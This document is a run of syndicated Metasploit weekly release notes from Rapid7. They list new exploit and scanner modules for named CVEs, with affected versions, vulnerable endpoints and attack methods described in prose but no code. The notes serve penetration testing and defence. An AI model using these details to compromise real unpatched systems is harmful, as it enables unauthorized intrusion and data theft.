To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/09/08/metasploit-weekly-wrap-up-26/

New module content (4)

Roundcube TimeZone Authenticated File Disclosure

Authors: joel, stonepresto, and thomascube
Type: Auxiliary
Pull request: #18286 contributed by cudalac
Path: auxiliary/gather/roundcube_auth_file_read
AttackerKB reference: CVE-2017-16651

Description: This PR adds a module to retrieve an arbitrary file on hosts running Roundcube versions from 1.1.0 through version 1.3.2.

Elasticsearch Memory Disclosure

Authors: Eric Howard, R0NY, and h00die
Type: Auxiliary
Pull request: #18322 contributed by h00die
Path: auxiliary/scanner/http/elasticsearch_memory_disclosure
AttackerKB reference: CVE-2021-22145

Description: Adds an aux scanner module which exploits a memory disclosure vulnerability within Elasticsearch 7.10.0 to 7.13.3 (inclusive) by submitting a malformed query that generates an error message containing previously used portions of a data buffer. The disclosed memory could contain sensitive information such as Elasticsearch documents or authentication details.

QueueJumper – MSMQ RCE Check

Authors: Bastian Kanbach, Haifei Li, and Wayne Low
Type: Auxiliary
Pull request: #18281 contributed by bka-dev
Path: auxiliary/scanner/msmq/cve_2023_21554_queuejumper
AttackerKB reference: CVE-2023-21554

Description: This PR adds a module that detects Windows hosts that are vulnerable to Microsoft Message Queuing Remote Code Execution aka QueueJumper.

SolarView Compact unauthenticated remote command execution vulnerability.

Author: h00die-gr3y
Type: Exploit
Pull request: #18313 contributed by h00die-gr3y
Path: exploits/linux/http/solarview_unauth_rce_cve_2023_23333
AttackerKB reference: CVE-2023-23333

Description: This PR adds a module which exploits a vulnerability that allows remote code execution on a vulnerable SolarView Compact device by bypassing internal restrictions through the vulnerable endpoint downloader.php using the file parameter. Firmware versions up to v6.33 are vulnerable.

Enhancements and features (2)

• #18179 from jvoisin – This improves the windows checkvm post module by adding new techniques to identify the hypervisor in which the session is running.
• #18190 from jvoisin – This improves the linux checkvm post module by adding new techniques to identify the hypervisor in which the session is running.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.32…6.3.33
• Full diff 6.3.32…6.3.33

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/09/01/metasploit-weekly-wrap-up-25/

Pumpkin Spice Modules

Here in the northern hemisphere, fall is on the way: leaves changing, the air growing crisp and cool, and some hackers changing the flavor of their caffeine. This release features a new exploit module targeting Apache NiFi as well as a new and improved library to interact with it.

New module content (1)

Apache NiFi H2 Connection String Remote Code Execution

Authors: Matei "Mal" Badanoiu and h00die
Type: Exploit
Pull request: #18257 contributed by h00die
Path: exploits/linux/http/apache_nifi_h2_rce
AttackerKB reference: CVE-2023-34468

Description: This adds an exploit module for a Apache NiFi h2 remote code execution identified as CVE-2023-34468. Versions 0.0.2 through 1.21.0 are vulnerable and allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution. This also adds a library with helper functions for modules targeting this product.

Enhanced Modules

Modules which have either been enhanced, or renamed:

Elasticsearch Enumeration Utility

Authors: Silas Cutler and h00die
Type: Auxiliary
Pull request: #18310 contributed by h00die
Path: auxiliary/gather/elasticsearch_enum

Description: This updates the Elasticsearch auxiliary module. It has been renamed to elastic_enum, accepts credentials and will store data to disk that is pulled from the target.

• #18247 from EgeBalci – This adds an exploit module that leverages an authentication bypass and an arbitrary file upload in Netgear ProSAFE NMS300. These vulnerabilities have been identified as CVE-2023-38096 and CVE-2023-38098 respectively and affects versions below 1.7.0.22. By chaining together these vulnerabilities, an unauthenticated remote attacker can execute arbitrary code with SYSTEM privileges.

Enhancements and features (1)

• #18309 from zeroSteiner – This updates the ldap_query module to stream the results instead of collecting them all at once. This should improve the UX of using the module in large target environments with 10s of thousands of accounts and the like.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.31…6.3.32
• Full diff 6.3.31…6.3.32

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/08/25/metasploit-weekly-wrap-up-24/

Power[shell]Point

This week’s new features and improvements start with two new exploit modules leveraging CVE-2023-34960 Chamilo versions 1.11.18 and below and CVE-2023-26469 in Jorani 1.0.0. Like CVE-2023-34960, I too, feel attacked by PowerPoint sometimes.
We also have several improvements, including additions to fetch payloads, PostgreSQL authentication, and documentation.

New module content (2)

Chamilo unauthenticated command injection in PowerPoint upload

Authors: Randorisec and h00die-gr3y
Type: Exploit
Pull request: #18233 contributed by h00die-gr3y
Path: exploits/linux/http/chamilo_unauth_rce_cve_2023_34960
AttackerKB reference: CVE-2023-34960

Description: This adds an exploit module that leverages an unauthenticated remote command execution vulnerability Chamilo versions 1.11.18 and below. This vulnerability is identified as CVE-2023-34960. Due to a functionality called Chamilo Rapid to easily convert PowerPoint slides to courses on Chamilo, it is possible for an unauthenticated remote attacker to execute arbitrary commands at OS level using a malicious SOAP request at the vulnerable endpoint /main/webservices/additional_webservices.php.

Jorani unauthenticated Remote Code Execution

Author: RIOUX Guilhem (jrjgjk)
Type: Exploit
Pull request: #18123 contributed by Guilhem7
Path: exploits/multi/php/jorani_path_trav
AttackerKB reference: CVE-2023-26469

Description: This PR adds a module that chains together a log poisoning LFI redirection bypass and a path traversal vulnerability to obtain unauthenticated RCE.

Enhancements and features (4)

• #18214 from bwatters-r7 – This makes two improvements to the fetch payloads. The first improvement is that the FETCH_SRVHOST option will be set to LHOST when LHOST is set and FETCH_SRVHOST is not, meaning there is now one less option users need to set when using a payload with a reverse stager. The second improvement is that the default command for the Windows HTTP payload has been changed to CERTUTIL which will offer better compatibility with older versions of Windows than the previous CURL command. The HTTPS and TFTP payloads will still default to CURL.
• #18276 from adfoster-r7 – Updates all PostgreSQL modules to now support a newer form of authentication (SASL-SCRAM-256) that pen testers are seeing in the wildnow more frequently seeing in the wild. This includes the modules for PostgreSQL authentication brute force, version fingerprinting, running queries, etc.
• #18307 from ismaildawoodjee – This fixes documentation typos with the exploit/multi/http/subrion_cms_file_upload_rce module.
• #18308 from ismaildawoodjee – Improves the readability of documentation/modules/exploit/windows/http/smartermail_rce.

Bugs fixed (5)

• #18272 from sfewer-r7 – This fixes an issue in the exploit module multi/http/adobe_coldfusion_rce_cve_2023_26360 when the target ColdFusion server is deployed with a Development profile.
• #18287 from zeroSteiner – This fixes a stack trace thrown by the forge_ticket module when the SPN datastore option was left blank. The module now fails due to bad-config and gives a detailed error message.
• #18297 from adfoster-r7 – This fixes the broken scanner/mysql/mysql_authbypass_hashdump module and adds documentation for the module.
• #18298 from adfoster-r7 – Changes the behavior of setting LHOST as an interface name, for example with set LHOST eth0. Previously, a non-deterministic IP would be resolved from the adapter name if the adapter had multiple IPv4/IPv6 addresses registered. Now the lowest ordinal IPv4 addresses is preferenced first, followed by any IPv6 addresses.
• #18306 from zeroSteiner – Fixes a crash when parsing ThriftHeader binary data.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.30…6.3.31
• Full diff 6.3.30…6.3.31

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/08/18/metasploit-weekly-wrap-up-23/

Meterpreter Testing

This week’s release adds new payload tests to our automated test suite. This is intended to help the team and community members identify issues and behavior discrepancies before changes are made. Payloads run on a variety of different platforms including Windows, Linux, and OS X each of which has multiple Meterpreter implementations available that are now tested to help ensure consistency. This should improve payload stability and make testing easier for community members that are contributing new features to the payloads.

New module content (4)

H2 Web Interface Create Alias RCE

Authors: Nairuz Abulhul, gambler, h00die, and h4ckNinja
Type: Exploit
Pull request: #18226 contributed by h00die
Path: exploits/linux/http/h2_webinterface_rce

Description: This PR adds an exploit against the H2 database’s web console. An authenticated user can issue requests to invoke built-in functionality to execute arbitrary code. There is no CVE for this issue.

Maltrail Unauthenticated Command Injection

Authors: Chris Wild and Ege BALCI
Type: Exploit
Pull request: #18280 contributed by EgeBalci
Path: exploits/unix/http/maltrail_rce

Description: This PR adds a module for an unauthenticated RCE vulnerability in Maltrail, a malicious traffic detection system. The module author indicated that this vulnerability does not have a CVE associated with it as the vendor (product team in this case) declined to assign one.

RaspAP Unauthenticated Command Injection

Authors: Ege BALCI and Ismael0x00
Type: Exploit
Pull request: #18263 contributed by EgeBalci
Path: exploits/unix/http/raspap_rce
AttackerKB reference: CVE-2022-39986

Description: This PR adds an unauthenticated command injection module for the RaspAP webgui application.

Greenshot .NET Deserialization Fileformat Exploit

Authors: bwatters-r7 and p4r4bellum
Type: Exploit
Pull request: #18253 contributed by bwatters-r7
Path: exploits/windows/fileformat/greenshot_deserialize_cve_2023_34634
AttackerKB reference: CVE-2023-34634

Description: This PR adds a file-format exploit affecting Greenshot versions 1.3.274 and earlier, including the last stable release, 1.2.10.6.

Enhancements and features (1)

• #18288 from adfoster-r7 – Adds stability enhancements to Meterpreter payloads. Additionally, this adds a large suite of automated sanity tests to Github Actions that verify OSX/Windows/Linux/Python/Java/PHP Meterpreter payloads work.

Bugs fixed (3)

• #18275 from adfoster-r7 – Updates the module metadata for the Java reverse_http and reverse_https stagers to be treated as a dynamic payload size, instead of a static/fixed size. This size change can happen as the Java payload contains a user-configurable HTTP callback URL, and combined with the Zip compression present in JAR files – the overall generated payload size can change as a result.
• #18278 from rorymckinley – Fixes a crash when running the auxiliary/scanner/mysql/mysql_login module against newer versions of MySQL.
• #18289 from zeroSteiner – Fixes a typo in the exploit/freebsd/http/citrix_formssso_target_rce docs.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.29…6.3.30
• Full diff 6.3.29…6.3.30

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).